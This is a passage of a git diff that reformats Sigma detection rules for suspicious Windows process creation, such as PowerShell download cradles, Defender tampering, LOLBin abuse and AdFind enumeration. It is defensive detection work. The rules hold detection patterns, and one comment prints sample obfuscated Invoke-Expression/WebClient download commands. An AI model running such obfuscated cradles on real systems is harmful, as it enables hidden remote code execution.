PowerShell - - Product: PowerShell Core 6 - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - CommandLine|contains: + - /c powershell # FPs with sub processes that contained "powershell" somewhere in the command line + - /c pwsh + - Description: Windows PowerShell + - Product: PowerShell Core 6 + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll condition: process_creation and (all of selection_*) falsepositives: - Other scripts diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml index a6afb81ef..045bae8e1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml @@ -1,8 +1,7 @@ title: PowerShell Script Run in AppData id: ac175779-025a-4f12-98b0-acdaeb77ea85 status: test -description: Detects a suspicious command line execution that invokes PowerShell with - reference to an AppData folder +description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder references: - https://twitter.com/JohnLaTwC/status/1082851155481288706 - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03 @@ -20,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - powershell.exe - \powershell - \pwsh - pwsh.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - '/c ' - \AppData\ - CommandLine|contains: + CommandLine|contains: - Local\ - Roaming\ condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml index f05513107..b31bf4fe2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml @@ -1,8 +1,7 @@ title: PowerShell DownloadFile id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5 status: test -description: Detects the execution of powershell, a WebClient object creation and - the invocation of DownloadFile in a single command line +description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .DownloadFile - System.Net.WebClient diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml index ee882cea7..21679db7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml @@ -1,11 +1,10 @@ title: Tamper Windows Defender Remove-MpPreference id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 related: - - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 - type: similar + - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 + type: similar status: test -description: Detects attempts to remove Windows Defender configurations using the - 'MpPreference' cmdlet +description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection_remove: - CommandLine|contains: Remove-MpPreference + CommandLine|contains: Remove-MpPreference selection_tamper: - CommandLine|contains: + CommandLine|contains: - '-ControlledFolderAccessProtectedFolders ' - '-AttackSurfaceReductionRules_Ids ' - '-AttackSurfaceReductionRules_Actions ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml index 60e642d5b..da67be2d0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml @@ -1,8 +1,8 @@ title: Powershell Token Obfuscation - Process Creation id: deb9b646-a508-44ee-b7c9-d8965921c6b6 related: - - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 - type: similar + - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 + type: similar status: test description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation references: @@ -21,9 +21,15 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] - - CommandLine|re: '"(\{\d\})+"\s*-f' - - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} + # Examples: + # IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString + # &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString + # &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString + # ${e`Nv:pATh} + - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] + # - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme + - CommandLine|re: '"(\{\d\})+"\s*-f' + - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml index 29c22b28c..e88c93c1f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml @@ -1,11 +1,10 @@ title: User Discovery And Export Via Get-ADUser Cmdlet id: 1114e048-b69c-4f41-bc20-657245ae6e3f related: - - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 - type: similar + - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 + type: similar status: test -description: Detects usage of the Get-ADUser cmdlet to collect user information and - output it to a file +description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -23,17 +22,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'Get-ADUser ' - ' -Filter \*' - CommandLine|contains: + CommandLine|contains: - ' > ' - ' | Select ' - Out-File @@ -41,7 +40,6 @@ detection: - Add-Content condition: process_creation and (all of selection_*) falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml index a4e6b80c2..876497753 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml @@ -1,9 +1,7 @@ title: Net WebClient Casing Anomalies id: c86133ad-4725-4bd0-8170-210788e0a7ba status: test -description: Detects PowerShell command line contents that include a suspicious abnormal - casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation - techniques +description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ author: Florian Roth (Nextron Systems) @@ -20,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_encoded: - CommandLine|contains: + CommandLine|contains: - TgBlAFQALgB3AEUAQg - 4AZQBUAC4AdwBFAEIA - OAGUAVAAuAHcARQBCA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml index ed6a14cb8..919ffcac8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml @@ -1,8 +1,8 @@ title: Suspicious X509Enrollment - Process Creation id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 related: - - id: 504d63cb-0dba-4d02-8531-e72981aace2c - type: similar + - id: 504d63cb-0dba-4d02-8531-e72981aace2c + type: similar status: test description: Detect use of X509Enrollment references: @@ -22,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - X509Enrollment.CBinaryConverter - 884e2002-217d-11da-b2a4-000e7bbb2b09 condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml index fb7cb12e4..4ded4bf17 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml @@ -1,8 +1,8 @@ title: Suspicious XOR Encoded PowerShell Command id: bb780e0c-16cf-4383-8383-1e5471db6cf9 related: - - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 - type: obsoletes + - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 + type: obsoletes status: test description: Detects presence of a potentially xor encoded powershell command references: @@ -10,8 +10,7 @@ references: - https://redcanary.com/blog/yellow-cockatoo/ - https://zero2auto.com/2020/05/19/netwalker-re/ - https://mez0.cc/posts/cobaltstrike-powershell-exec/ -author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, - oscd.community, Nasreddine Bencherchali +author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali date: 2018/09/05 modified: 2023/01/30 tags: @@ -28,18 +27,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows PowerShell - - Product: PowerShell Core 6 + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows PowerShell + - Product: PowerShell Core 6 selection_cli_xor: - CommandLine|contains: bxor + CommandLine|contains: bxor selection_cli_other: - CommandLine|contains: + CommandLine|contains: - ForEach - for( - 'for ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml index 69ac69647..922f8c73f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml @@ -1,22 +1,16 @@ title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a @@ -34,7 +28,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Compress-Archive -Path*-DestinationPath $env:TEMP - Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\ - Compress-Archive -Path*-DestinationPath*:\Windows\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml b/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml index 7adf04885..1fe9d18d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via PresentationHost.EXE id: b124ddf4-778d-418e-907f-6dd3fc0d31cd status: test -description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" - (Browser Applications) files to download arbitrary files +description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - NewProcessName|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml b/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml index a84d0b148..481dcb3e5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml @@ -1,11 +1,8 @@ title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE id: d22e2925-cfd8-463f-96f6-89cec9d9bc5f status: test -description: 'Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE - from an uncommon location. These files can be abused to run malicious ".xbap" - files any bypass AWL - - ' +description: | + Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL references: - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - NewProcessName|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: .xbap + CommandLine|contains: .xbap filter_main_generic: - CommandLine|contains: + CommandLine|contains: # Filter out legitimate locations if you find them - ' C:\Windows\' - ' C:\Program Files' condition: process_creation and (all of selection* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml index 3017b744c..1ae1a938f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml @@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution id: a20391f8-76fb-437b-abc0-dba2df1952c6 related: - - id: 65c3ca2c-525f-4ced-968e-246a713d164f - type: similar + - id: 65c3ca2c-525f-4ced-968e-246a713d164f + type: similar status: test -description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that - can be used to execute any other binary +description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 @@ -27,7 +26,6 @@ detection: ParentProcessName|endswith: \Microsoft.NodejsTools.PressAnyKey.exe condition: process_creation and selection falsepositives: - - Legitimate use by developers as part of NodeJS development with Visual Studio - Tools + - Legitimate use by developers as part of NodeJS development with Visual Studio Tools level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml b/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml index af8eae9a6..1a3efa814 100644 --- a/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml @@ -19,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|startswith: print - CommandLine|contains|all: + CommandLine|startswith: print + CommandLine|contains|all: - /D - .exe - NewProcessName|endswith: \print.exe + NewProcessName|endswith: \print.exe filter_print: - CommandLine|contains: print.exe + CommandLine|contains: print.exe condition: process_creation and (selection and not filter_print) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml b/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml index 63e5913d2..6977f9ddd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml @@ -1,10 +1,8 @@ title: File Download Using ProtocolHandler.exe id: 104cdb48-a7a8-4ca7-a453-32942c6e5dcb status: test -description: 'Detects usage of "ProtocolHandler" to download files. Downloaded files - will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - - ' +description: | + Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/ @@ -22,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \protocolhandler.exe - - OriginalFileName: ProtocolHandler.exe + - NewProcessName|endswith: \protocolhandler.exe + - OriginalFileName: ProtocolHandler.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml index 349992fa8..ec4ab4ab1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml @@ -1,15 +1,14 @@ title: Potential Provlaunch.EXE Binary Proxy Execution Abuse id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c related: - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects child processes of "provlaunch.exe" which might indicate potential - abuse to proxy execution. +description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -28,25 +27,26 @@ detection: selection: ParentProcessName|endswith: \provlaunch.exe filter_main_covered_children: - - NewProcessName|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - NewProcessName|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd + - NewProcessName|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - NewProcessName|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml index 137384ea2..5095f02a3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml @@ -1,15 +1,14 @@ title: Suspicious Provlaunch.EXE Child Process id: f9999590-1f94-4a34-a91e-951e47bedefd related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects suspicious child processes of "provlaunch.exe" which might indicate - potential abuse to proxy execution. +description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -28,25 +27,25 @@ detection: selection_parent: ParentProcessName|endswith: \provlaunch.exe selection_child: - - NewProcessName|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - NewProcessName|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + - NewProcessName|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - NewProcessName|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml b/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml index 3bbbc404f..32420aa9e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml +++ b/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml @@ -1,8 +1,7 @@ title: Screen Capture Activity Via Psr.EXE id: 2158f96f-43c2-43cb-952a-ab4580f32382 status: test -description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility - used to record the user screen and clicks. +description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. references: - https://lolbas-project.github.io/lolbas/Binaries/Psr/ - https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /start - -start - NewProcessName|endswith: \Psr.exe + NewProcessName|endswith: \Psr.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml index ef44fc5e2..2cc03717c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml @@ -19,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \3proxy.exe + NewProcessName|endswith: \3proxy.exe selection_pe: Description: 3proxy - tiny proxy server - selection_params: - CommandLine|contains: .exe -i127.0.0.1 -p + selection_params: # param combos seen in the wild + CommandLine|contains: .exe -i127.0.0.1 -p condition: process_creation and (1 of selection_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml index 51ed13443..20af610d1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml @@ -1,11 +1,10 @@ title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE id: 455b9d50-15a1-4b99-853f-8d37655a4c1b related: - - id: 9a132afa-654e-11eb-ae93-0242ac130002 - type: similar + - id: 9a132afa-654e-11eb-ae93-0242ac130002 + type: similar status: test -description: Detects active directory enumeration activity using known AdFind CLI - flags +description: Detects active directory enumeration activity using known AdFind CLI flags references: - https://www.joeware.net/freetools/tools/adfind/ - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx @@ -23,8 +22,8 @@ detection: process_creation: EventID: 4688 Channel: Security - selection_password: - CommandLine|contains: + selection_password: # Listing password policy + CommandLine|contains: - lockoutduration - lockoutthreshold - lockoutobservationwindow @@ -33,10 +32,10 @@ detection: - minpwdlength - pwdhistorylength - pwdproperties - selection_enum_ad: - CommandLine|contains: -sc admincountdmp - selection_enum_exchange: - CommandLine|contains: -sc exchaddresses + selection_enum_ad: # Enumerate Active Directory Admins + CommandLine|contains: -sc admincountdmp + selection_enum_exchange: # Enumerate Active Directory Exchange AD Objects + CommandLine|contains: -sc exchaddresses condition: process_creation and (1 of selection_*) falsepositives: - Authorized administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml index 9e6c64cd4..f747e59d5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml @@ -1,10 +1,10 @@ title: PUA - AdFind Suspicious Execution id: 9a132afa-654e-11eb-ae93-0242ac130002 related: - - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b - type: similar - - id: 75df3b17-8bcc-4565-b89b-c9898acef911 - type: obsoletes + - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b + type: similar + - id: 75df3b17-8bcc-4565-b89b-c9898acef911 + type: obsoletes status: test description: Detects AdFind execution with common flags seen used during attacks references: @@ -15,8 +15,7 @@ references: - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects -author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, - oscd.community +author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community date: 2021/02/02 modified: 2023/03/05 tags: @@ -34,7 +33,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml index eca988680..d227bf44e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml @@ -1,8 +1,7 @@ title: PUA - Advanced IP Scanner Execution id: bef37fa2-f205-4a7b-b484-0759bfd5f86f status: test -description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for - ransomware groups. +description: Detects the use of 